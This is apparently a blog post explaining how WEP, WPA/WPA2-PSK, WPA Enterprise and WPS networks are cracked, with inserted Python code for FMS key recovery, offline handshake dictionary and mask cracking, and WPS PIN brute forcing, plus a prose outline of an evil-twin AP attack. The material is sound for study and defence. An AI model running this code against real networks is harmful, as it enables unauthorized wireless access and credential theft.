Local Tech Repair: How a Cracker breaks wifi and more details, WEP,WPA,WPA2,WPS and more

Tuesday, June 23, 2015

How a Cracker breaks wifi and more details, WEP,WPA,WPA2,WPS and more


Attacking wifi: the tools, and how the attacks work.
Wifi networks come in several types: open, WEP, WPA (WPA1), WPA2, and WPA2 Enterprise. There is also a service on wifi meant to make connecting for the first time easier. This service is called WPS (Wi-Fi Protected Setup). WPS can be enabled or disabled on an access point, and when it is enabled it offers a push-button mode and a PIN mode. The sections below cover each one.


Here is the explanation of the different types of wifi connections, the attacks against them, and how to defend against them.


Open:

Open wifi networks are just that: open to everyone. There is not much for an attacker to do here other than connect. Keep in mind that open also means unencrypted, so anyone within radio range can read every frame on the network, whether or not they ever connect to it.
 
Wep:

Wired Equivalent Privacy is the first encryption type for wifi. It was never meant to be the most secure option, only better than nothing. The vulnerability in WEP comes from how it keys the RC4 stream cipher: a 24-bit initialization vector (IV) is sent in the clear with every frame and prepended to the secret key to form the per-frame RC4 key. The Fluhrer, Mantin, and Shamir attack (FMS) recovers the key from a large number of captured frames by exploiting weak IVs, IV values for which the first byte of RC4 keystream leaks a byte of the key. The first plaintext byte of a WEP data frame is always the same (the LLC/SNAP header byte 0xAA), so the first keystream byte is known for every frame captured. By gathering a lot of IVs, around 50k, you should be able to get the key. Read more about the actual attack at the link above.
These attacks are easy to run with tools like aircrack-ng, or with scripts that automate the whole attack for you like wifite or wepcrackgui. Note that aircrack-ng's default method is the newer PTW attack, which needs roughly 40k to 85k IVs for a 104-bit key; the older FMS/KoreK statistical attacks need considerably more.
So the attack generally goes like this. The attacker puts the card in monitor mode with something like airmon-ng; once in monitor mode the card can pick up packets across the air even if it is not connected to that network (see monitor mode). From there the attacker picks the channel of the target and begins. After capturing IV packets, sped up by deauthenticating a client, replaying captured ARP requests with aireplay-ng, or some other injection attack, the attacker runs aircrack-ng against the captured IVs to get the key.
Another simple explanation of the WEP attack can be found here.
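To make the weak-IV idea concrete, here is an added example (not code from the original post or from aircrack-ng) that simulates the FMS attack end to end against a constructed 40-bit WEP key. It stands in for the capture step by encrypting one frame under every IV of the weak class (A+3, 255, X), then recovers the key byte by byte from the first keystream byte of each frame, which the attacker knows because the first plaintext byte of a WEP data frame is 0xAA. The key, the IVs, and the verification frame are all constructed here; a real capture would contain millions of ordinary IVs and only a few dozen weak ones per class, which is why the real attack needs so many packets.

```python
"""Simulated Fluhrer-Mantin-Shamir (FMS) key recovery against WEP's RC4 keying.

Added example, not the original post's code. Everything below (the 40-bit key,
the IV set, the verification frame) is constructed for the demonstration.
"""

SNAP_DSAP = 0xAA  # first plaintext byte of every WEP data frame (LLC/SNAP header)


def rc4_keystream(key, n):
    """Plain RC4: key-scheduling (KSA) followed by n bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, plaintext):
    """WEP per-frame keying: RC4 key = 3-byte IV || secret key (ICV trailer omitted)."""
    keystream = rc4_keystream(bytes(iv) + secret, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, keystream))


def capture_weak_frames(secret):
    """Simulate sniffing one frame per weak IV (A+3, 255, X) for each key byte A.
    Returns {iv: first keystream byte}; the attacker gets that byte by XORing the
    first ciphertext byte with the known 0xAA plaintext byte."""
    captured = {}
    for a in range(len(secret)):
        for x in range(256):
            iv = (a + 3, 255, x)
            captured[iv] = wep_encrypt(secret, iv, bytes([SNAP_DSAP]))[0] ^ SNAP_DSAP
    return captured


def fms_votes(known_prefix, captured):
    """Tally FMS votes for secret key byte number len(known_prefix).

    For each IV, run the KSA only over the bytes already known (IV + prefix).
    If the state is 'resolved' (S[1] < A+3 and S[1] + S[S[1]] == A+3), then with
    probability about e^-3 the first PRGA byte equals S[A+3], which reveals the
    j used at KSA step A+3 and therefore the unknown key byte."""
    a = len(known_prefix)
    votes = [0] * 256
    for iv, ks0 in captured.items():
        k = list(iv) + list(known_prefix)
        s = list(range(256))
        j = 0
        for i in range(a + 3):
            j = (j + s[i] + k[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        x = s[1]
        if x >= a + 3 or x + s[x] != a + 3:
            continue                      # IV not resolved for this key position
        j_next = s.index(ks0)             # where step A+3 must have fetched S[A+3] from
        votes[(j_next - j - s[a + 3]) & 0xFF] += 1
    return votes


def recover_key(captured, key_len, verify_iv, verify_ct, verify_pt, width=4):
    """Depth-first search over the `width` best-voted candidates per byte. A full
    candidate is accepted only if it reproduces one captured frame whose plaintext
    (an LLC/SNAP header) the attacker can predict."""
    def search(prefix):
        if len(prefix) == key_len:
            cand = bytes(prefix)
            return cand if wep_encrypt(cand, verify_iv, verify_pt) == verify_ct else None
        votes = fms_votes(prefix, captured)
        for b in sorted(range(256), key=lambda v: -votes[v])[:width]:
            found = search(prefix + [b])
            if found is not None:
                return found
        return None
    return search([])


def demo():
    """Run the whole attack against a constructed key; returns (true key, recovered key)."""
    secret = bytes.fromhex("1f8a3c77e2")            # constructed 40-bit WEP key
    captured = capture_weak_frames(secret)
    # One extra sniffed frame with an ordinary IV: its first 8 plaintext bytes are the
    # LLC/SNAP header of an IPv4 frame, which lets the attacker verify a key guess.
    verify_iv, verify_pt = (0x4E, 0x21, 0x9C), bytes.fromhex("aaaa030000000800")
    verify_ct = wep_encrypt(secret, verify_iv, verify_pt)
    return secret, recover_key(captured, len(secret), verify_iv, verify_ct, verify_pt)


if __name__ == "__main__":
    true_key, found = demo()
    print("true key:", true_key.hex(), "recovered:", found.hex() if found else None)
```

The voting is probabilistic (a resolved IV votes correctly only about 5% of the time), which is why `recover_key` keeps the top few candidates per byte and verifies each full guess against a frame with predictable plaintext instead of trusting the single best vote; real tools do the same with the frame's CRC-32 ICV. A 104-bit key is attacked exactly the same way, only with 13 byte positions instead of 5.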


WPA1:

Wi-Fi Protected Access is leaps and bounds ahead of WEP, though it still has some issues: weak keys, WPA packet spoofing and decryption. With WPA there are attacks against WPA-TKIP (Beck-Tews and its successors) that let an attacker decrypt small packets such as ARP frames and then inject forged packets to hijack connections.
You can read more about the actual attacks at the links below:
https://lirias.kuleuven.be/bitstream/123456789/401042/1/wpatkip.pdf
http://dl.aircrack-ng.org/breakingwepandwpa.pdf
http://download.aircrack-ng.org/wiki-files/doc/enhanced_tkip_michael.pdf

There are two encryption protocols used with WPA: TKIP and CCMP. Most of the attacks above target TKIP. If the network is using CCMP then it is using the AES cipher, which is a lot stronger.

Other attacks against WPA Personal (WPA1-PSK) run a dictionary attack against the captured 4-way handshake, or, if the SSID is a common one, use a precomputed (rainbow) table. Rainbow tables are generally not used because of the way WPA derives its keys: the passphrase is run through PBKDF2 with the SSID as the salt (4096 iterations of HMAC-SHA1) to produce the 256-bit pairwise master key (PMK). This means that two networks with two different SSIDs and the same passphrase have two different PMKs, so a table only helps for the SSIDs it was built for. The PMK is then combined with the two MAC addresses and the two nonces from the handshake to make the pairwise transient key (PTK), and the first 128 bits of the PTK are what the handshake's MIC is computed with; that MIC is what a cracker checks every guess against.

Unless you have a user with a simple dictionary word or a common SSID name, brute forcing is generally not the best option out there. This does not mean it is impossible if you take human habit and the standard into account. WPA-PSK requires the passphrase to be 8 to 63 characters long. Knowing this, and knowing that humans want to type the least possible, they will most likely use a word that is only 8 characters long, the minimum length required. This allows an attacker to build mask attacks against WPA keys in the hope that the human element created the weakness. A mask attack does not bother brute forcing 1 to 7 character passphrases; it starts at 8, and if on top of that you only try, say, four letters followed by four digits, you reduce the keyspace dramatically (26^4 * 10^4, about 4.6 million candidates, against 95^8, about 6.6 * 10^15, for all 8-character printable strings), making a brute force on a GPU practical. Here is a benchmark of how fast a single GPU can run pyrit HERE. So if you combine a lot of GPUs, like the Amazon cloud, your own farm, or a botnet, then cracking WPA is a lot faster than expected.
You can find out more about the WPA standard at the link below:
https://en.wikipedia.org/wiki/IEEE_802.11
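The following is an added example (not code from the original post or from any cracking tool) showing the derivation described above and the per-guess work a cracker does: passphrase and SSID to PMK, PMK plus handshake MACs and nonces to PTK, and the PTK's first 16 bytes (the KCK) used to recompute the MIC of a captured EAPOL-Key frame. The handshake, the SSID "CoffeeShop", the MAC addresses, the nonces and the EAPOL frame layout are all constructed here; in practice they come from a capture of the 4-way handshake. The MIC follows the WPA2/CCMP rule (HMAC-SHA1 truncated to 16 bytes); WPA1/TKIP uses HMAC-MD5 for the same field. The mask helper goes slightly beyond the text by parsing hashcat-style masks in general, not only the four-letters-four-digits case.

```python
"""WPA/WPA2-PSK key derivation and offline cracking of a captured 4-way handshake.

Added example, not the original post's code. The handshake below is constructed
from a known passphrase so the cracking functions have something to test against.
"""
import hashlib
import hmac
import math
import string
from itertools import islice, product


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); the SSID is the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512: HMAC-SHA1(PMK, label || 0x00 || data || counter), data = sorted MACs || sorted nonces."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]           # bytes 0..15 are the KCK, the key the MIC is computed with


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2 Key MIC: HMAC-SHA1 over the EAPOL-Key frame with its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase, ssid="CoffeeShop"):
    """Constructed stand-in for what airodump-ng would capture from a real handshake."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    # Constructed EAPOL-Key message 2 with the 16-byte Key MIC field zeroed:
    # version, type, body length, descriptor type, key info, then SNonce and zero-filled fields.
    eapol = b"\x02\x03\x00\x5f\x02\x01\x0a" + bytes(8) + snonce + bytes(48)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def check_passphrase(candidate, hs):
    """True if the candidate reproduces the captured MIC: one PBKDF2 plus a few HMACs per guess."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def dictionary_attack(candidates, hs):
    """Return the first candidate that verifies, or None. Words outside 8..63 characters are
    skipped without hashing: the standard forbids them, so they cannot be the PSK."""
    for word in candidates:
        if 8 <= len(word) <= 63 and check_passphrase(word, hs):
            return word
    return None


MASK_SETS = {"l": string.ascii_lowercase, "u": string.ascii_uppercase,
             "d": string.digits, "s": string.punctuation}


def mask_candidates(mask):
    """Enumerate a hashcat-style mask such as '?l?l?l?l?d?d?d?d' (four letters then four digits)."""
    sets = [MASK_SETS[c] for c in mask.split("?")[1:]]
    return ("".join(chars) for chars in product(*sets))


def mask_keyspace(mask):
    """Number of candidates the mask covers, without enumerating them."""
    return math.prod(len(MASK_SETS[c]) for c in mask.split("?")[1:])


if __name__ == "__main__":
    hs = make_handshake("summer08")       # constructed: a human-minimum 8-character passphrase
    print("dictionary hit:", dictionary_attack(["password", "12345678", "summer08"], hs))
    print("mask ?l?l?l?l?d?d?d?d keyspace:", mask_keyspace("?l?l?l?l?d?d?d?d"))
    print("all printable 8-character strings:", 95 ** 8)
    print("first mask candidates:", list(islice(mask_candidates("?l?l?l?l?d?d?d?d"), 3)))
```

Each guess costs a full PBKDF2 (4096 HMAC-SHA1 rounds), which is the whole reason GPUs matter here: the PMK cannot be reused across SSIDs, but the PTK and MIC steps are cheap, so the cracker's throughput is set by PBKDF2 alone. Feeding `mask_candidates(...)` to `dictionary_attack` runs the mask attack described above, at whatever rate the CPU manages.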


WPA2 Personal (aka WPA2-PSK):

Along with what was mentioned above for WPA, the WPA2 protocol was built to fix shortcomings in the authentication and privacy of WPA1; CCMP (AES) is mandatory in WPA2 and TKIP is only kept for backwards compatibility. I won't go over the information about the attacks again. WPA2 in general has fewer flaws than WPA, but the attack vector against WPA2-PSK is still the same: capture the 4-way handshake and crack the passphrase offline.

WPA Enterprise:

WPA-Enterprise uses 802.1X/EAP with a RADIUS server to authenticate each user on the network instead of one shared passphrase. The major flaw found in it is MS-CHAPv2, the inner authentication used inside PEAP and EAP-TTLS in most deployments: its challenge/response reduces to brute forcing a single DES key (2^56 tries, regardless of how complex the password is), and the recovered NT hash is enough to log in. An attacker gets a challenge/response pair by standing up a rogue access point with the same SSID, so clients that do not validate the RADIUS server's certificate are the ones at risk. Check out the link below for more information on the attack. https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/

WPS:

WPS is a protocol to help non-technical users easily set up wifi networks: instead of typing out a complex passphrase they push a button, or enter an 8-digit PIN printed on the router, and connect. You can find out more about WPS at the link below
https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup
The WPS PIN attack implemented by reaver was originally explained here and here. It works because the registrar (the access point) confirms the two halves of the PIN separately, and the last digit is a checksum, so at most 10,000 + 1,000 = 11,000 guesses are needed instead of 10^8. It was later improved upon by the offline Pixie Dust attack (Dominique Bongard), which wiire implemented; you can find the code for it here: pixiewps.
A more updated toolset is located at the next 2 links for reaver and pixiewps.
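To show why the PIN attack is cheap, here is an added example (not code from the original post, reaver, or pixiewps) with the PIN checksum rule and a simplified registrar that answers the two halves separately, as the real M4/M6 exchange does. The registrar class and the attack loop are constructed for this illustration: the real protocol proves each half with hashed commitments, and reaver also has to cope with lockouts and rate limiting, none of which is modelled here.

```python
"""WPS PIN structure and why split verification makes an online brute force feasible.

Added example, not the original post's code. SimulatedRegistrar is a constructed
stand-in for the access point's M4/M6 answers; it has no lockout or rate limit.
"""


def wps_checksum(first_seven):
    """Checksum digit for the 7-digit PIN body: weights 3,1,3,1,3,1,3 from the left,
    the same rule hostapd's wps_pin_checksum() applies."""
    digits = [int(c) for c in f"{first_seven:07d}"]
    acc = sum(d * w for d, w in zip(digits, (3, 1, 3, 1, 3, 1, 3)))
    return (10 - acc % 10) % 10


def wps_pin_valid(pin):
    """An 8-digit PIN is well formed when its last digit matches the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedRegistrar:
    """Answers the two half-PIN proofs the way a WPS registrar does: the first half is
    confirmed at M4, the second half only at M6. Counts queries as the attacker sees them."""

    def __init__(self, pin):
        assert wps_pin_valid(pin)
        self._pin = pin
        self.queries = 0

    def first_half_ok(self, half):
        self.queries += 1
        return half == self._pin[:4]

    def second_half_ok(self, first_half, half):
        self.queries += 1
        return first_half == self._pin[:4] and half == self._pin[4:]


def reaver_style_attack(registrar):
    """Guess the first four digits, then the last three (the eighth is computed, not guessed).
    Worst case 10^4 + 10^3 queries, never 10^8. Returns the PIN or None."""
    first = next(h for h in (f"{n:04d}" for n in range(10_000)) if registrar.first_half_ok(h))
    for n in range(1_000):
        second = f"{n:03d}" + str(wps_checksum(int(first + f"{n:03d}")))
        if registrar.second_half_ok(first, second):
            return first + second
    return None


if __name__ == "__main__":
    reg = SimulatedRegistrar("12345670")   # constructed PIN; 12345670 is a well-formed example
    print("recovered:", reaver_style_attack(reg), "after", reg.queries, "queries")
```

With real hardware the limiting factor is not the arithmetic but the access point: each guess is a full WPS exchange that takes a second or more, and many routers lock WPS after a run of failures, which is why reaver runs take hours and why the offline Pixie Dust attack (which needs only one exchange) was such an improvement.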

Since there is a huge amount of information at the links above, I won't go into the attacks much or how they are done.
Instead, even better… VIDEO!!!!






To sum all this up, the easiest attack is against WEP or WPS, depending on the encryption used and whether WPS is enabled. If neither of these is in use, or they are turned off, then the attacker falls back to another method or gives up. He could try to brute force the passphrase hoping the human created it insecurely, or, what is not commonly thought of, run an evil AP attack on the client. This attack de-authenticates the client from the valid SSID, and if the client has ever connected to an open network like Starbucks wifi or attwifi, the attacker creates an SSID with that name and most systems will automatically connect to it. Once they are connected to the attacker's system and passing their network traffic through his machine, he can inject code into their TCP connections and gain access to their computer. Once in their computer he has the ability to dump the saved wifi credentials. When an attacker attacks wifi it is not always the wifi protocol that he attacks. I hope this helps you learn how it is done. So to close it all off… I will show you the easy automated way of doing it from your Android phone… yep, Android.